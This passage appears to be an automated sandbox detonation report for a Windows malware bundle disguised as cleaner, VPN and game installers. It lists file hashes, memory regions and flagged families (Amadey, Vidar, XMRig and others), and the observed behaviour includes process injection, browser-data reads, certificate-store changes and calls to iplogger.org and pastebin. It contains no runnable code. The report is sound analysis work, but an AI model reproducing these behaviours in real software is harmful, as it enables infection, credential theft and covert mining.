| SHA512 | 141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4 |
memory/2092-123-0x0000000000E90000-0x0000000000E98000-memory.dmp
memory/1040-138-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\decoder.dll
| MD5 | 62326d3ef35667b1533673d2bb1d342c |
| SHA1 | 8100ce90b7cbddd7ef2fd77c544ebf12ebd5ec33 |
| SHA256 | a087b791ff8ff9e05e339600199aa389a4554050acc7af7fa36dbe208be7382e |
| SHA512 | 7321feae8ee8d0653d7bd935e3d2e6f658e6798b2a7a8f44976c58509028e79284582132cb999c7c3124a7e94960d9c5d5fc8edefaeda06275ab725730d0d9b5 |
\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2952-154-0x0000000000400000-0x0000000000878000-memory.dmp
memory/3012-141-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1724-160-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\15211163522206146976
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi
| MD5 | e8814a38767e2058ea73c141708d3944 |
| SHA1 | 8a5cc50e86e64c724a458ef837a59881cf923534 |
| SHA256 | 3b948d673f54a39a50d92b2819ab8d1ad2c54f9c1de368b19fca2c8648661e8d |
| SHA512 | b0d7936840db0f8418a31f938144eb1826ebf6ac01ac358c5f6f607ba7267e6c1549ea46ea607dea825a5e83d2eae20304e29e25976cd66d21e87e7f7990f045 |
C:\Users\Admin\AppData\Local\Temp\CabCD01.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCE2D.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\152111635222
| MD5 | fc64e693b8771f963768ae48e078092e |
| SHA1 | 3b77890df36beed5fcd3311817685ee085696ba7 |
| SHA256 | eeb7f0490c8d2f726eb3b4f0303a5573389b7a81d406c2926403c9910145534a |
| SHA512 | 76a12363cae00c5cbc9670ba8b9883125bb54fced6b5e3a2d5b01e2afb036363dc0fa5d749096fd31bd70c2aeedf3d155164534761dd800f9b45a87a6454bb62 |
memory/1928-270-0x00000000023D0000-0x000000000250A000-memory.dmp
memory/1928-321-0x0000000002890000-0x0000000002934000-memory.dmp
memory/1928-328-0x0000000000370000-0x0000000000402000-memory.dmp
memory/1928-325-0x0000000000370000-0x0000000000402000-memory.dmp
memory/2524-332-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp
memory/1640-331-0x0000000000400000-0x00000000008D7000-memory.dmp
memory/1640-335-0x00000000009F0000-0x0000000000AF0000-memory.dmp
memory/3056-334-0x0000000000400000-0x0000000000877000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIEC7D.tmp
| MD5 | 07ce413b1af6342187514871dc112c74 |
| SHA1 | 8008f8bfeae99918b6323a3d1270dea63b3a8394 |
| SHA256 | 0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46 |
| SHA512 | 27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5 |
memory/2248-349-0x0000000000400000-0x0000000000878000-memory.dmp
memory/1040-348-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1440-359-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1928-382-0x00000000023D0000-0x000000000250A000-memory.dmp
memory/3056-383-0x0000000000400000-0x0000000000877000-memory.dmp
memory/1640-391-0x00000000009F0000-0x0000000000AF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/1928-531-0x0000000000370000-0x0000000000402000-memory.dmp
memory/1928-532-0x0000000002940000-0x0000000003DC2000-memory.dmp
memory/1928-533-0x0000000003DD0000-0x0000000003E5B000-memory.dmp
memory/1928-537-0x0000000003E60000-0x0000000003EE6000-memory.dmp
memory/2124-556-0x0000000002390000-0x00000000024CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg_1
| MD5 | dad3ad4310bc5bac9792e23d6949fcaa |
| SHA1 | 6dc7a1f5d6db6ef57dc854929110c9fd40ded9d3 |
| SHA256 | 9aff9d1d1319aeaeb1ec627f42d2527dd6e54c14125d6c639ec9739b11795db8 |
| SHA512 | 914deef5ffa1bac71109f81e57ab76b5a1f80d5b6c4b2717302c0d79e8ccc1b09e72a4c397521f7bfa15847aec7ce54038a316512e20637fb1e1c48b387f75d5 |
memory/2524-599-0x00000000005F0000-0x00000000005FE000-memory.dmp
memory/2124-605-0x00000000009E0000-0x0000000000A72000-memory.dmp
memory/2124-602-0x00000000009E0000-0x0000000000A72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI4167.tmp
| MD5 | 842cc23e74711a7b6955e6876c0641ce |
| SHA1 | 3c7f32c373e03d76e9f5d76d2dfdcb6508c7af56 |
| SHA256 | 7e434d53739356b7f74c5143b98138c6b67b38c2dbd772a28e8dde70e8be8644 |
| SHA512 | dd8323f657786fae516b400fe6b0569b8d4d16ccb4b396648b427e875d9e5b1eb7a874338d386f0940dc370de6fecf9893efd28149745bc9fd3f67a792ec824d |
memory/2312-615-0x000000013F3E0000-0x000000013F3F0000-memory.dmp
memory/2124-678-0x0000000002390000-0x00000000024CA000-memory.dmp
memory/2248-681-0x0000000000400000-0x0000000000878000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI6954.tmp
| MD5 | f32ac1d425e8b7c320d6be9a968585ab |
| SHA1 | 3b0bd3122226f2ac9f11664d9fc13d699b6dcfa0 |
| SHA256 | 96f8d286f86055dcb3a15e0f3a2de092b0441ec36455c14caaad4c1f5a227894 |
| SHA512 | d8d9d996e279b7500306614448d61d5c3ac9c2efc28ac71d1daa09951f342d2cf773f0a7b51cb847f4d91dd34018e4a2d7977c0f6f2859795d4f0df7ac894b27 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 29d6d6774a763d9ff493fd87c7c1a777 |
| SHA1 | a1c90149a906aaf22698ef7e40bb52266d96662a |
| SHA256 | 139e0e7875eadc77137f4f7b52cd63779011d9b1ca285516e2dd3c784790a153 |
| SHA512 | eb4740dfaf806c28a3547b8b9cb050737ff4e01588281881592273f362948f183ca6242acbf8b3657e513297803e1afa318e3ae41267c91e8c190854fc06f79c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
memory/2124-834-0x00000000009E0000-0x0000000000A72000-memory.dmp
memory/2124-861-0x0000000003E60000-0x0000000003EE6000-memory.dmp
memory/2092-922-0x0000000000400000-0x0000000000878000-memory.dmp
memory/2124-923-0x0000000000060000-0x0000000000061000-memory.dmp
memory/2124-925-0x0000000000070000-0x0000000000075000-memory.dmp
memory/2124-924-0x0000000000060000-0x0000000000063000-memory.dmp
memory/2684-938-0x000000013F630000-0x000000013F636000-memory.dmp
C:\Config.Msi\f77c277.rbs
| MD5 | 9399e483f330ba22edbf122f3b7f56e9 |
| SHA1 | 52033f227a6f607e1b046a74908c545366e1d96a |
| SHA256 | 084a33c79436104d5b509d9ad1ae15cbf992f5a8a8c7231565e961beccafa688 |
| SHA512 | 6bdc8bd13e743c740e7ebc51ccf590b94c8f5f4f8a1ef2f2f6d4e5104c02dc4a967eb171e8fe6c89663732495d6c9a2167d43a395ec16f8be575f3217869396c |
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg
| MD5 | 31e2eb815eb3a794b04a2a300f24c3b0 |
| SHA1 | ac129cfafe62d2dd77a95ce9cacd5b8e5bf4b4fa |
| SHA256 | 7686c3e3e78ba82914789e8e69781299d054a910710f004c774a20b5b123e2c1 |
| SHA512 | ffe4ddc06d278d61c7d8d827eb33184310f43fb86b1850a45e5b06ed6562564df33073158b336efd7f9ed417d0a7123d17c3b7f7fc914d06f628d7588f4380fb |
C:\Users\Admin\AppData\Local\Temp\f7873aa.exe
| MD5 | 99c8a5f7c87b4ec0ac66592a85e129f5 |
| SHA1 | 3699ef050962cfa6e3d6440a941396c9f022ea52 |
| SHA256 | 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad |
| SHA512 | a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18 |
memory/1548-1166-0x0000000001020000-0x0000000001028000-memory.dmp
memory/1204-1197-0x0000000000A00000-0x0000000000A08000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-05 09:40
Reported
2024-12-05 09:42
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Vidar
Vidar family
Xmrig family
xmrig
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 816 | N/A | C:\Users\Admin\AppData\Local\Temp\inst001.exe | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv |
| PID 3240 set thread context of 3676 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI6D3C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7240.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI737B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e586b19.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7438.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e586b19.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI732B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI73AA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7192.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI71D2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst001.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\lijun-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Time Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd